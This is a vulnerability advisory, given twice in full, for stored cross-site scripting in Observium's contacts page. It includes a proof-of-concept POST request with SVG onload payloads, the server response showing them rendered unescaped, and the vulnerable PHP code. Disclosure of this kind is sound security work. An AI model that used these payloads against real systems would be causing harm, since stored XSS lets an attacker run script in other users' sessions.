ahpaleus/CVE-2020-25140.txt

## CVE-2020-25140.txt
CVE - CVE-2020-25140
------------------------------------------
Cross Site Scripting in contacts

------------------------------------------
[Description]
Penetration test has shown that the application is vulnerable to Cross-Site Scripting (XSS) due to the fact that it is possible to inject and store malicious JavaScript code within it.
------------------------------------------

[Additional Information]


Example request that allows to trigger XSS payload.

POST /contacts/ HTTP/1.1
Host: localhost
Connection: close
Content-Length: 1881
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Cookie: OBSID=4slh6iphh480ce9f69ub3m14rk5j452q; observium_screen_ratio=0.8999999761581421; observium_screen_resolution=3840x2160

contact_method=email&contact_descr=%3Csvg%2Fonload%3Dalert%281337%29%3E&contact_email_email=%22%3E%3Csvg%2Fonload%3Dconfirm%28document.domain%29%3E%22%40x.y&contact_hipchat_room_id=&contact_hipchat_token=&contact_hipchat_from=&contact_hipchat_url=&contact_hipchat_notify=true&contact_teams_webhook_address=&contact_messagebird_recipient=&contact_messagebird_originator=&contact_messagebird_accesskey=&contact_slack_channel=general&contact_slack_username=observium&contact_slack_url=&contact_slack_short=&contact_pagerduty_service_key=&contact_victorops_routing_key=everyone&contact_victorops_url=&contact_pushover_user=&contact_pushover_token=&contact_redoxygen_acctid=&contact_redoxygen_email=&contact_redoxygen_password=&contact_redoxygen_recipient=&contact_redoxygen_from=&contact_redoxygen_url=&contact_smsbox_phone=&contact_clickatell_recipient=&contact_clickatell_apiid=&contact_smstools_recipient=&contact_smstools_path=&contact_telegram_recipient=&contact_telegram_bot_hash=&contact_telegram_disable_notification=&contact_script_script=&contact_xmpp_recipient=&contact_xmpp_username=&contact_xmpp_password=&contact_xmpp_server=&contact_xmpp_port=&contact_webhook-old_url=&contact_webhook-old_token=&contact_webhook-old_originator=&contact_webhook_url=&contact_opsgenie_api_key=&contact_opsgenie_recipients=&contact_opsgenie_region=&contact_alertops_url=&contact_alertops_assignee=&contact_textlocal_recipient=&contact_textlocal_originator=&contact_textlocal_accesskey=&contact_smsenvoi_recipient=&contact_smsenvoi_originator=&contact_smsenvoi_apiid=&contact_smsenvoi_type=SMS&contact_smsenvoi_subtype=&contact_smsenvoi_senderlabel=&contact_smsinfobip_recipient=&contact_smsinfobip_originator=&contact_smsinfobip_base_url=&contact_smsinfobip_login=&contact_smsinfobip_password=&action=add_contact&requesttoken=e1ef5dbe9de4269131b7940c49f2de685cf89fc290e523a8f28e588dc6a637f5


Partial of server response:

HTTP/1.1 200 OK
Date: Tue, 11 Aug 2020 14:07:50 GMT
Server: Apache/2.4.6 (Red Hat Enterprise Linux) OpenSSL/1.0.2k-fips PHP/7.0.30
Strict-Transport-Security: max-age=63072000; includeSubdomains;
X-Frame-Options: DENY
X-Powered-By: PHP/7.0.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: OBSID=4slh6iphh480ce9f69ub3m14rk5j452q; expires=Tue, 11-Aug-2020 14:37:51 GMT; Max-Age=1800; path=/; secure;HttpOnly;Secure
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Content-Type-Options: nosniff
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1074141

<!DOCTYPE html>
<html lang="en">
<head>
    <base href="https://localhost/"/>
    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"/>
(…)
      <div class="modal-header">
        <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>
        <h3 class="modal-title" id="modal-contact_delete_19_label">Delete Contact "<svg/onload=alert(1337)>" (Id: 19, E-mail)</h3>
      </div>


Below we present vulnerable code:

/var/opt/observium/html/pages/contacts.inc.php:

167     $form = array('type'       => 'horizontal',
168                   'userlevel'  => 10,          // Minimum user level for display form
169                   'id'         => 'modal-contact_delete_'.$contact['contact_id'],
170                   'title'      => 'Delete Contact "'   . $contact['contact_descr'] .
171                                   '" (Id: '. $contact['contact_id'] . ', ' . $config['transports'][$contact['contact_method']]['na$
172                   //'modal_args' => $modal_args, // modal specific options
173                   //'help'      => 'This will delete the selected contact and any alert assocations.',
174                   //'class'     => '', // Clean default box class (default for modals)
175                   //'url'       => 'delhost/'
176                   );
177     //$form['fieldset']['body']   = array('class' => 'modal-body');   // Required this class for modal body!
178     //$form['fieldset']['footer'] = array('class' => 'modal-footer'); // Required this class for modal footer!


------------------------------------------

[VulnerabilityType Other]
Cross Site Scripting

------------------------------------------

[Vendor of Product]
https://www.observium.org/

------------------------------------------

[Affected Product Code Base]
Professional, Enterprise & Community 20.8.10631

------------------------------------------

[Affected Component]
contacts

------------------------------------------

[Attack Type]
Remote

------------------------------------------

[Reference]
https://github.com/OWASP/ASVS/blob/master/4.0/en/0x13-V5-Validation-Sanitization-Encoding.md
https://www.owasp.org/images/b/bc/OWASP_Top_10_Proactive_Controls_V3.pdf
https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001)
https://www.owasp.org/index.php/Testing_for_Stored_Cross_site_scripting_(OTG-INPVAL-002)
https://www.owasp.org/index.php/Testing_for_DOM-based_Cross_site_scripting_(OTG-CLIENT-001)


------------------------------------------

[Discoverer]
Maciej Domański

------------------------------------------


Maciej Domański / AFINE.com team
	CVE - CVE-2020-25140
	------------------------------------------
	Cross Site Scripting in contacts

	------------------------------------------
	[Description]
	Penetration test has shown that the application is vulnerable to Cross-Site Scripting (XSS) due to the fact that it is possible to inject and store malicious JavaScript code within it.
	------------------------------------------

	[Additional Information]


	Example request that allows to trigger XSS payload.

	POST /contacts/ HTTP/1.1
	Host: localhost
	Connection: close
	Content-Length: 1881
	Content-Type: application/x-www-form-urlencoded
	User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
	Cookie: OBSID=4slh6iphh480ce9f69ub3m14rk5j452q; observium_screen_ratio=0.8999999761581421; observium_screen_resolution=3840x2160

	contact_method=email&contact_descr=%3Csvg%2Fonload%3Dalert%281337%29%3E&contact_email_email=%22%3E%3Csvg%2Fonload%3Dconfirm%28document.domain%29%3E%22%40x.y&contact_hipchat_room_id=&contact_hipchat_token=&contact_hipchat_from=&contact_hipchat_url=&contact_hipchat_notify=true&contact_teams_webhook_address=&contact_messagebird_recipient=&contact_messagebird_originator=&contact_messagebird_accesskey=&contact_slack_channel=general&contact_slack_username=observium&contact_slack_url=&contact_slack_short=&contact_pagerduty_service_key=&contact_victorops_routing_key=everyone&contact_victorops_url=&contact_pushover_user=&contact_pushover_token=&contact_redoxygen_acctid=&contact_redoxygen_email=&contact_redoxygen_password=&contact_redoxygen_recipient=&contact_redoxygen_from=&contact_redoxygen_url=&contact_smsbox_phone=&contact_clickatell_recipient=&contact_clickatell_apiid=&contact_smstools_recipient=&contact_smstools_path=&contact_telegram_recipient=&contact_telegram_bot_hash=&contact_telegram_disable_notification=&contact_script_script=&contact_xmpp_recipient=&contact_xmpp_username=&contact_xmpp_password=&contact_xmpp_server=&contact_xmpp_port=&contact_webhook-old_url=&contact_webhook-old_token=&contact_webhook-old_originator=&contact_webhook_url=&contact_opsgenie_api_key=&contact_opsgenie_recipients=&contact_opsgenie_region=&contact_alertops_url=&contact_alertops_assignee=&contact_textlocal_recipient=&contact_textlocal_originator=&contact_textlocal_accesskey=&contact_smsenvoi_recipient=&contact_smsenvoi_originator=&contact_smsenvoi_apiid=&contact_smsenvoi_type=SMS&contact_smsenvoi_subtype=&contact_smsenvoi_senderlabel=&contact_smsinfobip_recipient=&contact_smsinfobip_originator=&contact_smsinfobip_base_url=&contact_smsinfobip_login=&contact_smsinfobip_password=&action=add_contact&requesttoken=e1ef5dbe9de4269131b7940c49f2de685cf89fc290e523a8f28e588dc6a637f5


	Partial of server response:

	HTTP/1.1 200 OK
	Date: Tue, 11 Aug 2020 14:07:50 GMT
	Server: Apache/2.4.6 (Red Hat Enterprise Linux) OpenSSL/1.0.2k-fips PHP/7.0.30
	Strict-Transport-Security: max-age=63072000; includeSubdomains;
	X-Frame-Options: DENY
	X-Powered-By: PHP/7.0.30
	Expires: Thu, 19 Nov 1981 08:52:00 GMT
	Cache-Control: no-store, no-cache, must-revalidate
	Pragma: no-cache
	Set-Cookie: OBSID=4slh6iphh480ce9f69ub3m14rk5j452q; expires=Tue, 11-Aug-2020 14:37:51 GMT; Max-Age=1800; path=/; secure;HttpOnly;Secure
	X-XSS-Protection: 1; mode=block
	X-Permitted-Cross-Domain-Policies: none
	X-Content-Type-Options: nosniff
	Connection: close
	Content-Type: text/html; charset=UTF-8
	Content-Length: 1074141

	<!DOCTYPE html>
	<html lang="en">
	<head>
	<base href="https://localhost/"/>
	<meta http-equiv="content-type" content="text/html; charset=utf-8"/>
	<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"/>
	(…)
	<div class="modal-header">
	<button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button>
	<h3 class="modal-title" id="modal-contact_delete_19_label">Delete Contact "<svg/onload=alert(1337)>" (Id: 19, E-mail)</h3>
	</div>





	Below we present vulnerable code:

	/var/opt/observium/html/pages/contacts.inc.php:

	167 $form = array('type' => 'horizontal',
	168 'userlevel' => 10, // Minimum user level for display form
	169 'id' => 'modal-contact_delete_'.$contact['contact_id'],
	170 'title' => 'Delete Contact "' . $contact['contact_descr'] .
	171 '" (Id: '. $contact['contact_id'] . ', ' . $config['transports'][$contact['contact_method']]['na$
	172 //'modal_args' => $modal_args, // modal specific options
	173 //'help' => 'This will delete the selected contact and any alert assocations.',
	174 //'class' => '', // Clean default box class (default for modals)
	175 //'url' => 'delhost/'
	176 );
	177 //$form['fieldset']['body'] = array('class' => 'modal-body'); // Required this class for modal body!
	178 //$form['fieldset']['footer'] = array('class' => 'modal-footer'); // Required this class for modal footer!


	------------------------------------------

	[VulnerabilityType Other]
	Cross Site Scripting

	------------------------------------------

	[Vendor of Product]
	https://www.observium.org/

	------------------------------------------

	[Affected Product Code Base]
	Professional, Enterprise & Community 20.8.10631

	------------------------------------------

	[Affected Component]
	contacts

	------------------------------------------

	[Attack Type]
	Remote

	------------------------------------------

	[Reference]
	https://github.com/OWASP/ASVS/blob/master/4.0/en/0x13-V5-Validation-Sanitization-Encoding.md
	https://www.owasp.org/images/b/bc/OWASP_Top_10_Proactive_Controls_V3.pdf
	https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001)
	https://www.owasp.org/index.php/Testing_for_Stored_Cross_site_scripting_(OTG-INPVAL-002)
	https://www.owasp.org/index.php/Testing_for_DOM-based_Cross_site_scripting_(OTG-CLIENT-001)



	------------------------------------------

	[Discoverer]
	Maciej Domański

	------------------------------------------


	Maciej Domański / AFINE.com team